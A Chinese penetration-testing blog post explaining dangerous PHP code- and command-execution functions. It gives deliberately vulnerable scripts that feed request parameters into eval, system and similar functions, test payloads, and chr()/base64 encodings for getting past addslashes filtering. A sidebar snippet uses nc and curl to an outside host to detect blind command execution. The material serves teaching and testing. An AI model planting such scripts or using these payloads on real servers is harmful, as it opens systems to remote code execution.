常见PHP危险函数验证

已于 2023-12-12 09:46:43 修改
阅读量493 收藏 1
点赞数
分类专栏: 渗透测试 文章标签: php
于 2021-09-29 21:37:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46567150/article/details/120552786
版权

1 eval 语句

        eval()会将符合PHP 语法规范字符串当作php 代码执行。

1.1 示例:

        首先在服务器端创建PHP脚本文件,构建危险语句,脚本代码如下:

<?php
$code = empty($_REQUEST['code'])?'phpinfo();':$_REQUEST['code'];

eval($code);

//	phpStudy-2016 后门的原理
?>

        首先定义一个变量“$code”,并进行判断是否为空,如果为空,执行“phpinfo();”代码,否则获取参数的值。

        访问该php文件,页面如下:

        给"$code"传送参数,传参方法可以查看之前的文章,

?code=system('ipconfig');

        该参数为PHP命令,面显示为:

        优化界面,将输出格式化,参数改为:   

?code=echo "<pre>";
system ('ipconfig');

 

1.2 绕过限制执行PHP 代码

        如果参数进入eval() 语句之前,进行了过滤,例如过滤了单双引号,进行上述传参会报错

<?php
$code = empty($_REQUEST['code'])?'phpinfo();':$_REQUEST['code'];

$code = addslashes($code);

eval($code);
?>

         针对这种情况,可以采用如下方法进行绕过:

1.2.1 将参数进行ASCII 编码

echo "<pre>";
system ('ipconfig');

进行ASCII编码为:

chr(101).chr(99).chr(104).chr(111).chr(32).chr(34).chr(60).chr(112).chr(114).chr(101).chr(62).chr(34).chr(59)

chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(32).chr(40).chr(39).chr(105).chr(112).chr(99).chr(111).chr(110).chr(102).chr(105).chr(103).chr(39).chr(41).chr(59)

传参后页面显示:

1.2.2 将参数进行BASE64 编码

echo "<pre>";
system ('ipconfig');

进行BASE64编码为:

ZWNobyAiPHByZT4iOwpzeXN0ZW0gKCdpcGNvbmZpZycpOw==

         传参时经过BASE64的编码需要将“=”去掉,而且需要在服务器上对参数进行BASE64解码,传参结果为:

2 assert()

        assert()同样会将字符串当做PHP 代码来执行。

示例:

        PHP脚本文件内代码为:

<?php

$code = empty($_REQUEST['code'])?'phpinfo();':$_REQUEST['code'];

assert($code);
?>

        进行传参访问页面:

3  preg_replace()

        preg_replace()函数的作用是对字符串进行正则匹配后替换。

示例:

        搜索$subject 中匹配$pattern 的部分,以$replacement 进行替换。

$str = preg_replace('=a=','A','abacadae');							//	AbAcAdAe
$str = preg_replace('=\[(.*)\]=','A','[phpinfo()]');		//A
$str = preg_replace('=\[(.*)\]=','$1','[phpinfo()]');

echo $str;

        当$pattern 处存在e 修饰符时,$replacement 的值会被当成PHP 代码来执行。

 PHP脚本文件内代码为:

$code = empty($_REQUEST['code'])?'[phpinfo()]':$_REQUEST['code'];
preg_replace('=\[(.*)\]=e','$1',$code);

 传参并访问页面:

4 回调函数

        一个函数调用另外一个函数。PHP 语言中回调函数有很多。下面主要介绍2种

4.1call_user_func()

函数用法

call_user_func('system','ipconfig');

//	第一个参数,被调用函数的函数名
//	第二个参数,被调用函数的参数

//	system('ipconfig');

示例:

        PHP脚本文件内代码为:

<?php
$code = empty($_REQUEST['code'])?'assert':$_REQUEST['code'];
$para = empty($_REQUEST['para'])?'phpinfo()':$_REQUEST['para'];

call_user_func($code,$para);
?>

        传参后显示页面:

4.2 array_map()

示例:

        PHP脚本文件内代码为:

<?php
$code = empty($_REQUEST['code'])?'assert':$_REQUEST['code'];
$para[] = empty($_REQUEST['para'])?'phpinfo()':$_REQUEST['para'];

array_map($code,$para);
?>

传参后页面为:

5 system()

        system()能够将字符串作为OS 命令执行。 

函数特点:

system()自带输出功能。

传参,支持命令中有空格。

示例:

        PHP脚本文件内代码为:

<?php
$cmd = empty($_REQUEST['cmd'])?'$cmd':$_REQUEST['cmd'];

system($cmd);
?>

传参后页面为:

6 exec()

        exec()函数能将字符串作为OS 命令执行。

函数特点:

需要输出命令执行结果。

只输出命令执行结果的最后一行,约等于没有回显。

示例:

        PHP脚本文件内代码为:

<?php
$cmd = empty($_REQUEST['cmd'])?'$cmd':$_REQUEST['cmd'];

echo exec($cmd);
?>

传参后页面为:

7 shell_exec()

         shell_exec()将参数当做OS 命令执行。

函数特点:

需要输出命令执行结果。

支持命令中有空格。

示例:

        PHP脚本文件内代码为:

<?php
$cmd = empty($_REQUEST['cmd'])?'whoami':$_REQUEST['cmd'];

echo shell_exec($cmd);
?>

传参后页面为:

8 passthru()

        passthru()将字符串当做系统命令执行。

函数特点:

自带输出功能

支持命令中有空格

示例:

        PHP脚本文件内代码为:

<?php
$cmd = isset($_REQUEST['cmd'])?$_REQUEST['cmd']:'whoami';
passthru($cmd);
?>

传参后页面为:

9 popen()

        popen()能够执行OS 命令。

函数特点:

函数返回值为文件指针

示例:

        PHP脚本文件内代码为:

<?php
$cmd = empty($_REQUEST['cmd'])?'whoami':$_REQUEST['cmd'];

$f = popen($cmd, 'r');

echo fread($f, 1024);
?>

传参后页面为:

 10 反引号

        反引号` 内的字符串,也会被解析成OS 命令。

示例:

        PHP脚本文件内代码为:

<?php
$cmd = isset($_REQUEST['cmd'])?$_REQUEST['cmd']:'whoami';

print(`$cmd`);
?>

传参后页面为:

江涞6
关注
专栏目录
php危险函数1
m0_55772907的博客
09-06 444
php危险函数
PHP危险函数总结
Lemon's blog
08-17 3967
前言:PHP中有很多危险函数,如phpinfo() ,这次就来详细总结一下PHP中的危险函数,方便以后学习。 一、PHP代码执行函数 eval()函数 定义和用法: eval() 函数把字符串按照 PHP 代码来计算. 该字符串必须是合法的 PHP 代码,且必须以分号结尾。 这个用法就会产生漏洞,通过一个例子来看一下: <?php $var = "var"; if (isset($_GE...
在线php代码安全检测,PHP 安全检测代码的实现方法
weixin_29698317的博客
03-12 306
这篇文章主要为大家详细介绍了PHP 安全检测代码的实现方法,具有一定的参考价值,可以用来参考一下。感兴趣的小伙伴,下面一起跟随512笔记的小玲来看看吧!代码如下:/*** html转换输出(只转义' " 保留Html正常运行) * @param $param* @return string*/function htmlEscape($param) {return trim(htmlspecial...
PHP-chr函数 对应的AscII码
十方地藏
10-08 8311
ASCII码对应表chr(9)、chr(10)、chr(13)、chr(32)、chr(34)、chr(39)、chr(... chr(9) tab空格       chr(10) 换行      chr(13) 回车        Chr(13)&chr(10) 回车换行       chr(32) 空格符       chr(34) 双引号       chr(39) 单引号 chr(
PHP表单验证
最新发布
红客网络编程与渗透技术
07-28 596
PHP 表单验证是 Web 开发中不可或缺的一部分。通过遵循上述步骤,你可以创建一个安全、有效的表单验证系统,确保用户输入的数据符合应用程序的要求,并保护应用程序免受潜在的安全威胁。红客网安PHP表单验证
PHP 中call_user_func相关函数的使用
weixin_30604651的博客
03-08 54
call_user_func 官方的解释是:把第一个参数作为回调函数(callback),并且将其余的参数作为回调函数的参数。 第一个参数可以是函数名,后面的均为作为该函数使用的参数。 1. call_user_func的初步使用 看例子: // 1. 初步使用 function sayHi($name){ echo $name .' say hi' ."<br...
常见PHP 危险函数
认真走好每一小步
07-19 816
代码执行函数、命令执行函数
php中eval和system的细节使用(配合文件上传漏洞)
Yuppie001的博客
12-19 1618
1.eval():函数用于执行作为字符串提供的 PHP 代码。这意味着它将一个 PHP 代码字符串作为参数,并执行它,就像它是常规的 PHP 代码一样。2.system(): 函数用于在 PHP 脚本中执行外部程序或者 shell 命令。它将命令传递给命令行并输出结果。
比较好用的PHP防注入漏洞过滤函数代码
12-18
- `num_check()`:这个函数用于验证输入是否为整型,通过`inject_check()`和`is_numeric()`函数检查非法字符和非数字输入。 - `str_check()`:此函数用于处理字符串输入,通过`inject_check()`防止SQL注入,并使用...
php HtmlReplace输入过滤安全函数
12-18
总的来说,理解并正确使用输入过滤函数是防止诸如跨站脚本(XSS)和SQL注入等常见安全漏洞的关键。开发者应该始终对用户输入保持警惕,并采取适当的防御措施,以保护应用程序免受攻击。在CodeIgniter等框架中,也...
浅析PHP编程中10个最常见的错误
10-25
某些PHP函数因其可能引入安全风险而被认为危险,例如eval()、shell_exec()等。应该避免使用这些函数,或者在绝对必要的情况下,严格限制它们的使用,并仔细验证输入。 错误7:不正确的会话管理 会话管理不当可能会...
WordPress中转义HTML与过滤链接的相关PHP函数使用解析
10-23
在Web开发中,确保网站内容的安全性是非常重要的,...这些函数能够帮助开发者避免常见的安全问题,并确保网站的安全性与用户体验。对于任何在WordPress平台上进行开发的开发者来说,理解和应用这两个函数是非常必要的。
php常见漏洞及编码安全(附笔记)
07-09
始终使用预定义的函数,而不是eval()等危险函数,避免动态构建SQL查询或执行系统命令。 8. 错误报告与日志:公开的错误信息可能暴露系统配置和漏洞,应配置PHP错误报告为仅在开发环境中显示,生产环境则记录到...
【心得】PHP的代码执行个人笔记
uuzeray的博客
11-15 504
(摘要)Code指脚本语言(php)的代码eval总结:eval(字符串) 表示将字符串按照php的代码执行php动态函数调用命令执行和代码执行的区别前者执行操作系统命令 或者执行 脚本语言的代码函数返回值 函数名字(函数参数);1 危险函数利用2 过滤了黑名单如果仅仅在代码中过滤了函数名称,那么大概率就等于 没过滤??`$_GET[2]`;无回显情况下的命令执行通道数据传输的路径shell_execsystem 相比,没有回显结果。
python eval、chr、ord、format、join、strip和split函数的使用
weixin_62859191的博客
08-24 1078
locals参数:该参数控制局部的命名空间,必须是字典,当glogals参数和locals参数冲突时,优先选择locals参数。作用:按指定字符进行分割,返回的是字典,参数控制分割的次数。作用:把对应的字符转换为对应的十进制整数,只能传一个字符。作用:通过字符串中的 {} 来识别替换字符串中的字符。格式:字符串.format(参数,...)eval(表达式,globals参数,locals参数)作用:将字符序列,按指定的字符串进行连接。格式:字符串.split(字符,参数)格式:字符串.join(字符串)
PHP为什么要避免使用eval()函数?底层原理是什么?
长风破浪会有时的博客
04-18 215
如果确实需要在代码中动态执行PHP代码,可以考虑使用更安全、更高效的替代方案,例如匿名函数、动态类生成、模板引擎等。同时,在处理用户输入时应该进行充分的验证和过滤,以防止注入攻击。首先,使用eval()函数可能会导致代码注入漏洞,因为它可以执行任何传递给它的代码字符串。其次,eval()函数的执行效率较低,因为它需要将字符串解析为PHP代码,这可能会消耗大量的CPU和内存资源。此外,由于eval()函数是在运行时执行的,因此在调试和测试过程中也可能会出现问题。
浅谈PHP无回显命令执行
qidiandexiaowu
11-09 1006
以前学过有回显的命令执行,但是无回显的还是第一次接触,这次就记录下来。 判断方法: 1.审计代码(我也不是很会) 2.延时判断 ip=|sleep 5 时间延长了就可能有无回显命令执行。 3.HTTP请求 ①在公网服务器监听监听端口 nc -lp 4444 ②向目标服务器发起http请求,执行curl命令 ip=|curl ip:4444 如果公网服务器能从监听端口得到一些信息,那麽他就可能存在无回显命令执行。 4.DNS请求 第一步 在解析的时候浏览器会检查缓存中有没有域名对应的ip地址,这个缓
java ascii 编码_JAVA 有没有ASCII字符编码一览表?
weixin_39849762的博客
02-12 348
二进制 十进制 十六进制 缩写 可以显示的表示法 名称/意义0000 0000 0 00 NUL ␀ 空字符(Null)0000 0001 1 01 SOH ␁ 标题开始0000 0010...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值